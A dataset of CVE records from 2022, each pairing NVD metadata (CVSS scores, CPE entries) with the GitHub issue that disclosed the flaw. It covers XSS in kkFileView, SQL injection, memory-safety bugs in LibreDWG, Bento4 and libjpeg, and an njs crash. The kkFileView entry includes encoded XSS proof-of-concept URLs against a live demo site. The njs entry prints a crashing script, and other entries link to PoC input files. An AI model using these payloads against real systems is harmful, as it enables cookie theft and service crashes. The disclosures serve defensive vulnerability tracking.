问题描述Description kkFileview v4.1.0存在XSS漏洞,可能导致网站cookies泄露。 kkFileview v4.1.0 has an XSS vulnerability, which may lead to the leakage of website cookies. 漏洞位置vulerable code location kkFileView/server/src/main/java/cn/keking/web/controller/OnlinePreviewController.java文件71行、86行,"urls"、"currentUrl"参数用户可控,且没有过滤特殊字符就输出到了页面 The vulnerability code is located at line 75,86 in kkFileView/server/src/main/java/cn/keking/web/controller/OnlinePreviewController.java , The 'urls' and 'currentUrl' parameter is user-controllable, and it is output to the page without filtering special characters @RequestMapping(value = "/picturesPreview") public String picturesPreview(String urls, Model model, HttpServletRequest req) throws UnsupportedEncodingException { String fileUrls; try { fileUrls = new String(Base64.decodeBase64(urls)); } catch (Exception ex) { String errorMsg = String.format(BASE64_DECODE_ERROR_MSG, "urls"); return otherFilePreview.notSupportedFile(model, errorMsg); } logger.info("预览文件url:{},urls:{}", fileUrls, urls); // 抽取文件并返回文件列表 String[] images = fileUrls.split("\\|"); List<String> imgUrls = Arrays.asList(images); model.addAttribute("imgUrls", imgUrls); String currentUrl = req.getParameter("currentUrl"); if (StringUtils.hasText(currentUrl)) { String decodedCurrentUrl = new String(Base64.decodeBase64(currentUrl)); model.addAttribute("currentUrl", decodedCurrentUrl); } else { model.addAttribute("currentUrl", imgUrls.get(0)); } return PICTURE_FILE_PREVIEW_PAGE; } 漏洞证明PoC 官方演示站点为最新4.1.0版本,以此为演示,访问漏洞位置(url参数值需要经过base64编码和url编码): https://file.keking.cn/picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B https://file.keking.cn/picturesPreview?urls=&currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B The official demo site is the latest version 4.1.0. Take this as a demo to access the vulnerability location (the URL parameter value needs to be Base64 encoded and URL encoded): https://file.keking.cn/picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B https://file.keking.cn/picturesPreview?urls=&currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B
kkFileView XSS Vulnerability
https://api.github.com/repos/kekingcn/kkFileView/issues/366/comments
2
2022-07-01T09:12:24Z
2022-07-29T08:34:36Z
https://github.com/kekingcn/kkFileView/issues/366
1,291,138,782
366
3,991
CVE-2022-35598
2022-08-18T02:15:08.633
A SQL injection vulnerability in ConnectionFactoryDAO.java in sazanrjb InventoryManagementSystem 1.0 allows attackers to execute arbitrary SQL commands via parameter username.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/sazanrjb/InventoryManagementSystem" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sazanrjb/InventoryManagementSystem/issues/14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/sazanrjb/InventoryManagementSystem" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sazanrjb/InventoryManagementSystem/issues/14" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:inventorymanagementsystem_project:inventorymanagementsystem:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "85B0AF3A-0FEC-4DE4-A207-67A3BA34AE18", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/sazanrjb/InventoryManagementSystem/issues/14
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sazanrjb", "InventoryManagementSystem" ]
Hey, I find few parameters are vulnerable to SQL injection vulnerability. A list of affected files: UserDAO.java Stocks.java SupplierDAO.java ProductDAO.java CustomerDAO.java ConnectionFactory.java
Sql Injection Security Issues
https://api.github.com/repos/sajxraj/InventoryManagementSystem/issues/14/comments
2
2022-07-09T02:23:14Z
2022-07-14T17:14:05Z
https://github.com/sajxraj/InventoryManagementSystem/issues/14
1,299,549,051
14
3,992
CVE-2022-35164
2022-08-18T05:15:07.603
LibreDWG v0.12.4.4608 & commit f2dea29 was discovered to contain a heap use-after-free via bit_copy_chain.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/497" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/497" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "0A8152A2-6867-4B31-8F47-A1A655A49EFF", "versionEndExcluding": "0.12.4.4608", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/LibreDWG/libredwg/issues/497
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
# Vulnerability description version: [0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608) & latest commit [f2dea29](https://github.com/LibreDWG/libredwg/commit/f2dea296a0a3bb16afdae8d2ca16749a617a4383) poc: [poc](https://github.com/0xdd96/PoC/raw/main/libredwg/UAF-bit_copy_chain) command: ./dwgrewrite poc **_This is similar to issue #364 and others, but it seems that the patch https://github.com/LibreDWG/libredwg/commit/e95cc1eea8744c40e298208679eda14039b9b5d3 has not fully fixed them._** Here is the trace reported by ASAN: ``` ==28024==ERROR: AddressSanitizer: heap-use-after-free on address 0x7ffff3b65800 at pc 0x5555564f67f6 bp 0x7fffffff6760 sp 0x7fffffff6750 READ of size 1 at 0x7ffff3b65800 thread T0 #0 0x5555564f67f5 in bit_read_RC libredwg/src/bits.c:317 #1 0x5555564f67f5 in bit_copy_chain libredwg/src/bits.c:3352 #2 0x555556105ec6 in obj_flush_hdlstream libredwg/src/encode.c:833 #3 0x555556105ec6 in dwg_encode_PLANESURFACE_private libredwg/src/dwg.spec:9150 #4 0x5555563a57df in dwg_encode_PLANESURFACE libredwg/src/dwg.spec:9136 #5 0x5555563a57df in dwg_encode_variable_type libredwg/src/classes.inc:247 #6 0x5555563ab3d0 in dwg_encode_add_object libredwg/src/encode.c:4432 #7 0x5555563c914c in dwg_encode libredwg/src/encode.c:2769 #8 0x55555575ca00 in dwg_write_file libredwg/src/dwg.c:429 #9 0x555555758a3f in main libredwg/programs/dwgrewrite.c:350 #10 0x7ffff726f0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) #11 0x55555575924d in _start (libredwg/build-ASAN/dwgrewrite+0x20524d) 0x7ffff3b65800 is located 0 bytes inside of 208896-byte region [0x7ffff3b65800,0x7ffff3b98800) freed by thread T0 here: #0 0x7ffff7699ffe in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dffe) #1 0x5555564f532c in bit_chain_alloc_size libredwg/src/bits.c:3046 #2 0x5555564f532c in bit_chain_alloc libredwg/src/bits.c:3062 #3 0x5555564f532c in bit_copy_chain libredwg/src/bits.c:3339 #4 0x1900000105 (<unknown module>) previously allocated by thread T0 here: #0 0x7ffff7699ffe in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dffe) #1 0x5555564f396f in bit_chain_alloc_size libredwg/src/bits.c:3046 #2 0x5555564f396f in bit_chain_alloc libredwg/src/bits.c:3062 #3 0x31fff (<unknown module>) ``` # Vulnerability analysis When running to `bit_copy_chain`, both `dat->chain` and `tmp_dat->chain` point to `0x7ffff3b65800` (see the gdb output below). This will lead to use-after-free, since line 3339 calls `realloc`, which frees the chunk `0x7ffff3b65800`, and line 3352 ties to read from the freed chunk. Also note that the comment says `bit_copy_chain` *Copy the whole content of tmp_data to dat, and reset tmp_dat*, so why `dat->chain = tmp_dat->chain` in this PoC should be further investigated. https://github.com/LibreDWG/libredwg/blob/f2dea296a0a3bb16afdae8d2ca16749a617a4383/src/bits.c#L3333-L3360 ``` pwndbg> p *dat $6 = { chain = 0x7ffff3b65800, size = 208896, byte = 204890, bit = 6 '\006', opts = 1 '\001', version = R_2000, from_version = R_2004, fh = 0x0 } pwndbg> p *tmp_dat $10 = { chain = 0x7ffff3b65800, size = 208896, byte = 204882, bit = 6 '\006', opts = 1 '\001', version = R_2000, from_version = R_2004, fh = 0x0 } ```
Heap use-after-free still exists in the bit_copy_chain
https://api.github.com/repos/LibreDWG/libredwg/issues/497/comments
2
2022-06-17T12:04:26Z
2023-06-27T10:19:27Z
https://github.com/LibreDWG/libredwg/issues/497
1,274,949,181
497
3,993
CVE-2022-35165
2022-08-18T05:15:07.657
An issue in AP4_SgpdAtom::AP4_SgpdAtom() of Bento4-1.6.0-639 allows attackers to cause a Denial of Service (DoS) via a crafted mp4 input.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "835" ]
835
https://github.com/axiomatic-systems/Bento4/issues/712
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
# Vulnerability description **version:** Bento4-1.6.0-639 **command:** ./mp42aac $POC /dev/null **Download:** [poc](https://github.com/0xdd96/PoC/raw/main/Bento4/AP4_SgpdAtom::AP4_SgpdAtom-out-of-memory) Here is the trace reported by ASAN: ``` $ mp42aac poc /dev/null AddressSanitizer: Out of memory. The process has exhausted 65536MB for size class 48. ================================================================= ==29843==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x18 bytes #0 0x7ffff769b947 in operator new(unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10f947) #1 0x555555911f52 in AP4_List<AP4_DataBuffer>::Add(AP4_DataBuffer*) /path_to_Bento4/Source/C++/Core/Ap4List.h:160 #2 0x5555559114bd in AP4_SgpdAtom::AP4_SgpdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /path_to_Bento4/Source/C++/Core/Ap4SgpdAtom.cpp:111 #3 0x555555910da4 in AP4_SgpdAtom::Create(unsigned int, AP4_ByteStream&) /path_to_Bento4/Source/C++/Core/Ap4SgpdAtom.cpp:54 #4 0x55555589399c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:729 #5 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233 #6 0x5555558b9c5f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #7 0x5555558b96c2 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #8 0x5555558b9229 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #9 0x555555893d26 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:796 #10 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233 #11 0x5555558c7b47 in AP4_DrefAtom::AP4_DrefAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4DrefAtom.cpp:84 #12 0x5555558c768b in AP4_DrefAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4DrefAtom.cpp:50 #13 0x555555892ccd in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:560 #14 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233 #15 0x5555558b9c5f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #16 0x5555558b96c2 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #17 0x5555558b9229 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #18 0x555555893d26 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:796 #19 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233 #20 0x5555558b9c5f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #21 0x5555558b96c2 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #22 0x5555558b9229 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #23 0x555555893d26 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:796 #24 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233 #25 0x5555558b9c5f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #26 0x5555558b96c2 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #27 0x5555558b9229 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #28 0x555555893d26 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:796 #29 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233 ==29843==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory (/lib/x86_64-linux-gnu/libasan.so.5+0x10f947) in operator new(unsigned long) ==29843==ABORTING ``` # Vulnerability analysis https://github.com/axiomatic-systems/Bento4/blob/0735fe81819fd5f6501e6649b6e0d4b2b7874d8f/Source/C%2B%2B/Core/Ap4SgpdAtom.cpp#L89-L114 ``` pwndbg> p entry_count $1 = 4278190081 pwndbg> p m_DefaultLength $2 = 20 pwndbg> p m_Version $3 = 1 '\001' pwndbg> p bytes_available $4 = 20 ``` The possible cause of this issue is that a crafted input can set `entry_count` to a large value (4,278,190,081) in line 90. Such a long loop (line 95-114) will allocate a lot of memory in line 106 and line 111, which eventually exhausts the memory. Since the return value of `stream.Read` is not checked in line 109, the loop will not terminate at the end of the input file.
Possible memory exhuastion in AP4_SgpdAtom::AP4_SgpdAtom(). The process has exhausted 65536MB memory.
https://api.github.com/repos/axiomatic-systems/Bento4/issues/712/comments
0
2022-05-31T14:44:43Z
2022-06-04T17:16:23Z
https://github.com/axiomatic-systems/Bento4/issues/712
1,253,977,287
712
3,994
CVE-2022-35166
2022-08-18T05:15:07.700
libjpeg commit 842c7ba was discovered to contain an infinite loop via the component JPEG::ReadInternal.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/76" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/76" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpeg:libjpeg:2022-06-15:*:*:*:*:*:*:*", "matchCriteriaId": "CDECFA58-57FC-4227-A771-A74B47C7C502", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "835" ]
835
https://github.com/thorfdbg/libjpeg/issues/76
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thorfdbg", "libjpeg" ]
**version:** latest commit https://github.com/thorfdbg/libjpeg/commit/842c7baef7808f12cad19b49b2efcfa9575dbc78 **poc:** [poc](https://github.com/0xdd96/PoC/raw/main/libjpeg/infinite-loop-ReadInternal) **command:** ./jpeg poc /dev/null Here is the backtrace in GDB: ``` pwndbg> backtrace #0 0x000055555558fa8a in Image::StartParseFrame (this=0x5555557433a0, io=0x555555741ad0) at image.cpp:658 #1 0x0000555555584739 in JPEG::ReadInternal (this=0x5555557414b8, tags=0x7fffffffdcf0) at jpeg.cpp:286 #2 0x00005555555843de in JPEG::Read (this=0x5555557414b8, tags=0x7fffffffdcf0) at jpeg.cpp:210 #3 0x000055555557a23e in Reconstruct (infile=0x7fffffffe6cf "../../script/test-libjpeg/modify8", outfile=0x7fffffffe6f1 "/dev/null", colortrafo=1, alpha=0x0, upsample=true) at reconstruct.cpp:121 #4 0x00005555555715be in main (argc=3, argv=0x7fffffffe448) at main.cpp:747 #5 0x00007ffff7abf0b3 in __libc_start_main (main=0x55555556fac1 <main(int, char**)>, argc=3, argv=0x7fffffffe448, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe438) at ../csu/libc-start.c:308 #6 0x000055555556f5ee in _start () ``` When `marker==0xffd9`, `ParseFrameHeader` will return `NULL` (line 627, image.cpp), which initializes `m_pCurrent` with `NULL` (line 667, image.cpp). https://github.com/thorfdbg/libjpeg/blob/842c7baef7808f12cad19b49b2efcfa9575dbc78/codestream/image.cpp#L621-L627 https://github.com/thorfdbg/libjpeg/blob/842c7baef7808f12cad19b49b2efcfa9575dbc78/codestream/image.cpp#L657-L678 Since `m_bReceivedFrameHeadere` is set to `true` after that (lne 672, image.cpp), further calls to `StartParseFrame` will keep returning `m_pCurreent=NULL`. https://github.com/thorfdbg/libjpeg/blob/842c7baef7808f12cad19b49b2efcfa9575dbc78/interface/jpeg.cpp#L284-L353 Such behavior leads to an infinite loop in `JPEG::ReadInternal`. When `m_pFrame==NULL` (line 285, jpeg.cpp), it will invoke `m_pImage->StartParseFrame` to initialize it (line 286, jpeg.cpp). Since `StartParseFrame` keeps returning `NULL` in this case, the while loop from line 284-353 cannot terminate.
Infinite loop in JPEG::ReadInternal
https://api.github.com/repos/thorfdbg/libjpeg/issues/76/comments
1
2022-06-26T04:17:35Z
2022-06-27T18:59:25Z
https://github.com/thorfdbg/libjpeg/issues/76
1,284,796,852
76
3,995
CVE-2022-35173
2022-08-18T06:15:07.280
An issue was discovered in Nginx NJS v0.7.5. The JUMP offset for a break instruction was not set to a correct offset during code generation, leading to a segmentation violation.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "http://hg.nginx.org/njs/rev/b7c4e0f714a9" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/commit/404553896792b8f5f429dc8852d15784a59d8d3e" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/553" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "http://hg.nginx.org/njs/rev/b7c4e0f714a9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/commit/404553896792b8f5f429dc8852d15784a59d8d3e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/553" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nginx:njs:0.7.5:*:*:*:*:*:*:*", "matchCriteriaId": "AFF53793-2148-4A4F-AA75-6D9B959E9B7A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "754" ]
754
https://github.com/nginx/njs/issues/553
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
Hi, the following PoC triggers a crash (related to string fmt?) in the latest commit. ```js (function() { while ([]) try { break try { return } catch (a) {} } catch (b) {} }()) ``` Environment: ``` Commit: e008f7ae22834ff1173b7a0067b14c821102018d System: Ubuntu 18.04.6 LTS ``` ASan output: ``` /njs/njs_asan/build/njs ./poc.js AddressSanitizer:DEADLYSIGNAL ================================================================= ==177164==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000803 (pc 0x7ffff6807384 bp 0x7fffffffb790 sp 0x7fffffffaf48 T0) ==177164==The signal is caused by a READ memory access. ==177164==Hint: address points to the zero page. #0 0x7ffff6807384 (/lib/x86_64-linux-gnu/libc.so.6+0xbb384) #1 0x497d01 in __asan_memcpy (/njs/njs_asan/build/njs+0x497d01) #2 0x4d2b96 in njs_vsprintf /njs/njs_asan/src/njs_sprintf.c:424:19 #3 0x541fe6 in njs_error_fmt_new /njs/njs_asan/src/njs_error.c:69:13 #4 0x4ea1a7 in njs_vmcode_error /njs/njs_asan/src/njs_vmcode.c #5 0x4e1c7e in njs_vmcode_interpreter /njs/njs_asan/src/njs_vmcode.c:993:17 #6 0x52dcdf in njs_function_lambda_call /njs/njs_asan/src/njs_function.c:693:11 #7 0x52d6d0 in njs_function_frame_invoke /njs/njs_asan/src/njs_function.c:780:16 #8 0x4e39ec in njs_vmcode_interpreter /njs/njs_asan/src/njs_vmcode.c:799:23 #9 0x4ddf17 in njs_vm_start /njs/njs_asan/src/njs_vm.c:539:11 #10 0x4cb35b in njs_process_script /njs/njs_asan/src/njs_shell.c:890:19 #11 0x4cbb68 in njs_process_file /njs/njs_asan/src/njs_shell.c:619:11 #12 0x4ca1fc in main /njs/njs_asan/src/njs_shell.c:303:15 #13 0x7ffff676dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #14 0x41d9a9 in _start (/njs/njs_asan/build/njs+0x41d9a9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb384) ==177164==ABORTING ```
SEGV in njs_sprintf.c:424:19
https://api.github.com/repos/nginx/njs/issues/553/comments
0
2022-06-20T21:18:10Z
2024-07-20T00:35:11Z
https://github.com/nginx/njs/issues/553
1,277,395,914
553
3,996
CVE-2022-2876
2022-08-18T08:15:07.563
A vulnerability, which was classified as critical, was found in SourceCodester Student Management System. Affected is an unknown function of the file index.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-206634 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
